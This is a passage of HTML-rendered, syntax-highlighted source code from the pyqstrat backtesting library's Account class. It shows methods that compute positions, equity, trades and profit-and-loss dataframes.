class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">[</span><span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">&gt;</span> <span class=\"n\">prev_timestamp</span><span class=\"p\">]</span>\n\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">[</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">!=</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> \n <span class=\"n\">intermediate_calc_timestamps</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">)</span>\n \n <span class=\"k\">for</span> <span class=\"n\">ts</span> <span class=\"ow\">in</span> <span class=\"n\">intermediate_calc_timestamps</span><span class=\"p\">:</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"mf\">0.</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">():</span>\n <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">calc_net_pnl</span><span class=\"p\">(</span><span class=\"n\">ts</span><span class=\"p\">)</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">+=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"p\">(</span><span class=\"n\">ts</span><span class=\"p\">)</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">[</span><span class=\"n\">ts</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">net_pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.position\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.position\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">position</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns netted position for a contract_group at a given date in number of contracts or shares.&#39;&#39;&#39;</span>\n <span class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"mf\">0.</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls_by_contract_group</span><span class=\"p\">[</span><span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span><span class=\"p\">]:</span>\n <span class=\"n\">position</span> <span class=\"o\">+=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">return</span> <span class=\"n\">position</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.positions\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.positions\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">positions</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"nb\">tuple</span><span class=\"p\">[</span><span class=\"n\">Contract</span><span class=\"p\">,</span> <span class=\"nb\">float</span><span class=\"p\">]]:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns all non-zero positions in a contract group</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"n\">positions</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span>\n <span class=\"n\">symbol</span> <span class=\"o\">=</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"k\">if</span> <span class=\"n\">symbol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">position</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"ow\">not</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isclose</span><span class=\"p\">(</span><span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">):</span> <span class=\"n\">positions</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">((</span><span class=\"n\">contract</span><span class=\"p\">,</span> <span class=\"n\">position</span><span class=\"p\">))</span>\n <span class=\"k\">return</span> <span class=\"n\">positions</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.equity\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.equity\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">equity</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">float</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns equity in this account in Account currency. Will cause calculation if Account has not previously </span>\n<span class=\"sd\"> calculated up to this date&#39;&#39;&#39;</span>\n <span class=\"n\">pnl</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"o\">.</span><span class=\"n\">get</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">pnl</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"n\">pnl</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_pnl</span><span class=\"p\">[</span><span class=\"n\">timestamp</span><span class=\"p\">]</span>\n <span class=\"k\">return</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">starting_equity</span> <span class=\"o\">+</span> <span class=\"n\">pnl</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span>\n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">Trade</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a list of trades with the given symbol and with trade date between (and including) start date </span>\n<span class=\"sd\"> and end date if they are specified. If symbol is None trades for all symbols are returned&#39;&#39;&#39;</span>\n <span class=\"k\">return</span> <span class=\"p\">[</span><span class=\"n\">trade</span> <span class=\"k\">for</span> <span class=\"n\">trade</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span> <span class=\"k\">if</span> <span class=\"p\">(</span><span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">start_date</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"o\">&gt;=</span> <span class=\"n\">start_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">isnat</span><span class=\"p\">(</span><span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">or</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">timestamp</span> <span class=\"o\">&lt;=</span> <span class=\"n\">end_date</span><span class=\"p\">)</span> <span class=\"ow\">and</span> <span class=\"p\">(</span>\n <span class=\"n\">contract_group</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span> <span class=\"ow\">or</span> <span class=\"n\">trade</span><span class=\"o\">.</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span> <span class=\"o\">==</span> <span class=\"n\">contract_group</span><span class=\"p\">)]</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.roundtrip_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.roundtrip_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">roundtrip_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span>\n <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">,</span> \n <span class=\"n\">start_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">,</span> \n <span class=\"n\">end_date</span><span class=\"p\">:</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">datetime64</span> <span class=\"o\">=</span> <span class=\"n\">NAT</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"nb\">list</span><span class=\"p\">[</span><span class=\"n\">RoundTripTrade</span><span class=\"p\">]:</span>\n <span class=\"sd\">&#39;&#39;&#39;Returns a list of round trip trades with the given symbol and with trade date </span>\n<span class=\"sd\"> between (and including) start date and end date if they are specified. </span>\n<span class=\"sd\"> If symbol is None trades for all symbols are returned&#39;&#39;&#39;</span>\n <span class=\"k\">return</span> <span class=\"n\">_roundtrip_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">_trades</span><span class=\"o\">.</span><span class=\"n\">copy</span><span class=\"p\">(),</span> <span class=\"n\">contract_group</span><span class=\"p\">,</span> <span class=\"n\">start_date</span><span class=\"p\">,</span> <span class=\"n\">end_date</span><span class=\"p\">)</span></div>\n\n<div class=\"viewcode-block\" id=\"Account.df_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_groups</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"n\">Sequence</span><span class=\"p\">[</span><span class=\"n\">ContractGroup</span><span class=\"p\">]</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns a dataframe with P&amp;L columns broken down by contract group and symbol</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: Return PNL for this contract group. If None (default), include all contract groups</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n <span class=\"k\">if</span> <span class=\"n\">contract_groups</span> <span class=\"ow\">is</span> <span class=\"kc\">None</span><span class=\"p\">:</span> \n <span class=\"n\">contract_groups</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"nb\">set</span><span class=\"p\">([</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">contract_group</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">]))</span>\n\n <span class=\"k\">if</span> <span class=\"nb\">isinstance</span><span class=\"p\">(</span><span class=\"n\">contract_groups</span><span class=\"p\">,</span> <span class=\"n\">ContractGroup</span><span class=\"p\">):</span> <span class=\"n\">contract_groups</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">contract_groups</span><span class=\"p\">]</span>\n\n <span class=\"n\">dfs</span> <span class=\"o\">=</span> <span class=\"p\">[]</span>\n <span class=\"k\">for</span> <span class=\"n\">contract_group</span> <span class=\"ow\">in</span> <span class=\"n\">contract_groups</span><span class=\"p\">:</span>\n <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span><span class=\"p\">:</span>\n <span class=\"n\">symbol</span> <span class=\"o\">=</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span>\n <span class=\"k\">if</span> <span class=\"n\">symbol</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">:</span> <span class=\"k\">continue</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span><span class=\"o\">.</span><span class=\"n\">df</span><span class=\"p\">()</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">)</span> <span class=\"o\">&gt;</span> <span class=\"mi\">1</span><span class=\"p\">:</span>\n <span class=\"n\">net_pnl_diff</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">diff</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">)</span> <span class=\"c1\"># np.diff returns a vector one shorter than the original</span>\n <span class=\"n\">last_index</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">nonzero</span><span class=\"p\">(</span><span class=\"n\">net_pnl_diff</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">last_index</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">]):</span> \n <span class=\"n\">last_index_</span> <span class=\"o\">=</span> <span class=\"n\">last_index</span><span class=\"p\">[</span><span class=\"mi\">0</span><span class=\"p\">][</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"o\">+</span> <span class=\"mi\">1</span>\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">iloc</span><span class=\"p\">[:</span><span class=\"n\">last_index_</span> <span class=\"o\">+</span> <span class=\"mi\">1</span><span class=\"p\">]</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">name</span>\n <span class=\"n\">dfs</span><span class=\"o\">.</span><span class=\"n\">append</span><span class=\"p\">(</span><span class=\"n\">df</span><span class=\"p\">)</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">concat</span><span class=\"p\">(</span><span class=\"n\">dfs</span><span class=\"p\">)</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">ret_df</span><span class=\"o\">.</span><span class=\"n\">sort_values</span><span class=\"p\">(</span><span class=\"n\">by</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">ret_df</span> <span class=\"o\">=</span> <span class=\"n\">ret_df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;contract_group&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;symbol&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;price&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> \n <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">]]</span>\n <span class=\"k\">return</span> <span class=\"n\">ret_df</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_account_pnl\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_account_pnl\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_account_pnl</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"p\">,</span> <span class=\"n\">contract_group</span><span class=\"p\">:</span> <span class=\"n\">ContractGroup</span> <span class=\"o\">|</span> <span class=\"kc\">None</span> <span class=\"o\">=</span> <span class=\"kc\">None</span><span class=\"p\">)</span> <span class=\"o\">-&gt;</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"p\">:</span>\n <span class=\"sd\">&#39;&#39;&#39;</span>\n<span class=\"sd\"> Returns PNL at the account level.</span>\n<span class=\"sd\"> </span>\n<span class=\"sd\"> Args:</span>\n<span class=\"sd\"> contract_group: If set, we only return pnl for this contract_group. Otherwise we return pnl for all contract groups</span>\n<span class=\"sd\"> &#39;&#39;&#39;</span>\n\n <span class=\"k\">if</span> <span class=\"n\">contract_group</span> <span class=\"ow\">is</span> <span class=\"ow\">not</span> <span class=\"kc\">None</span><span class=\"p\">:</span>\n <span class=\"n\">symbols</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"k\">for</span> <span class=\"n\">contract</span> <span class=\"ow\">in</span> <span class=\"n\">contract_group</span><span class=\"o\">.</span><span class=\"n\">contracts</span> <span class=\"k\">if</span> <span class=\"n\">contract</span><span class=\"o\">.</span><span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">]</span>\n <span class=\"n\">symbol_pnls</span> <span class=\"o\">=</span> <span class=\"p\">[</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"p\">[</span><span class=\"n\">symbol</span><span class=\"p\">]</span> <span class=\"k\">for</span> <span class=\"n\">symbol</span> <span class=\"ow\">in</span> <span class=\"n\">symbols</span><span class=\"p\">]</span>\n <span class=\"k\">else</span><span class=\"p\">:</span>\n <span class=\"n\">symbol_pnls</span> <span class=\"o\">=</span> <span class=\"nb\">list</span><span class=\"p\">(</span><span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">symbol_pnls</span><span class=\"o\">.</span><span class=\"n\">values</span><span class=\"p\">())</span>\n\n <span class=\"n\">timestamps</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">calc_timestamps</span>\n <span class=\"n\">position</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">realized</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">unrealized</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">fee</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">commission</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n <span class=\"n\">net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">np</span><span class=\"o\">.</span><span class=\"n\">full</span><span class=\"p\">(</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">),</span> <span class=\"mf\">0.</span><span class=\"p\">,</span> <span class=\"n\">dtype</span><span class=\"o\">=</span><span class=\"nb\">float</span><span class=\"p\">)</span>\n\n <span class=\"k\">for</span> <span class=\"n\">i</span><span class=\"p\">,</span> <span class=\"n\">timestamp</span> <span class=\"ow\">in</span> <span class=\"nb\">enumerate</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">):</span>\n <span class=\"k\">for</span> <span class=\"n\">symbol_pnl</span> <span class=\"ow\">in</span> <span class=\"n\">symbol_pnls</span><span class=\"p\">:</span>\n <span class=\"n\">_position</span><span class=\"p\">,</span> <span class=\"n\">_price</span><span class=\"p\">,</span> <span class=\"n\">_realized</span><span class=\"p\">,</span> <span class=\"n\">_unrealized</span><span class=\"p\">,</span> <span class=\"n\">_fee</span><span class=\"p\">,</span> <span class=\"n\">_commission</span><span class=\"p\">,</span> <span class=\"n\">_net_pnl</span> <span class=\"o\">=</span> <span class=\"n\">symbol_pnl</span><span class=\"o\">.</span><span class=\"n\">pnl</span><span class=\"p\">(</span><span class=\"n\">timestamp</span><span class=\"p\">)</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_position</span><span class=\"p\">):</span> <span class=\"n\">position</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_position</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_realized</span><span class=\"p\">):</span> <span class=\"n\">realized</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_realized</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_unrealized</span><span class=\"p\">):</span> <span class=\"n\">unrealized</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_unrealized</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_fee</span><span class=\"p\">):</span> <span class=\"n\">fee</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_fee</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_commission</span><span class=\"p\">):</span> <span class=\"n\">commission</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_commission</span>\n <span class=\"k\">if</span> <span class=\"n\">math</span><span class=\"o\">.</span><span class=\"n\">isfinite</span><span class=\"p\">(</span><span class=\"n\">_net_pnl</span><span class=\"p\">):</span> <span class=\"n\">net_pnl</span><span class=\"p\">[</span><span class=\"n\">i</span><span class=\"p\">]</span> <span class=\"o\">+=</span> <span class=\"n\">_net_pnl</span>\n\n <span class=\"n\">df</span> <span class=\"o\">=</span> <span class=\"n\">pd</span><span class=\"o\">.</span><span class=\"n\">DataFrame</span><span class=\"o\">.</span><span class=\"n\">from_records</span><span class=\"p\">(</span><span class=\"nb\">zip</span><span class=\"p\">(</span><span class=\"n\">timestamps</span><span class=\"p\">,</span> <span class=\"n\">position</span><span class=\"p\">,</span> <span class=\"n\">unrealized</span><span class=\"p\">,</span> <span class=\"n\">realized</span><span class=\"p\">,</span> <span class=\"n\">commission</span><span class=\"p\">,</span> <span class=\"n\">fee</span><span class=\"p\">,</span> <span class=\"n\">net_pnl</span><span class=\"p\">),</span> \n <span class=\"n\">columns</span><span class=\"o\">=</span><span class=\"p\">[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">])</span>\n <span class=\"n\">df</span><span class=\"p\">[</span><span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]</span> <span class=\"o\">=</span> <span class=\"bp\">self</span><span class=\"o\">.</span><span class=\"n\">starting_equity</span> <span class=\"o\">+</span> <span class=\"n\">df</span><span class=\"o\">.</span><span class=\"n\">net_pnl</span>\n <span class=\"k\">return</span> <span class=\"n\">df</span><span class=\"p\">[[</span><span class=\"s1\">&#39;timestamp&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;position&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;unrealized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;realized&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;commission&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;fee&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;net_pnl&#39;</span><span class=\"p\">,</span> <span class=\"s1\">&#39;equity&#39;</span><span class=\"p\">]]</span></div>\n \n<div class=\"viewcode-block\" id=\"Account.df_trades\"><a class=\"viewcode-back\" href=\"../../pyqstrat.html#pyqstrat.account.Account.df_trades\">[docs]</a> <span class=\"k\">def</span> <span class=\"nf\">df_trades</span><span class=\"p\">(</span><span class=\"bp\">self</span><span 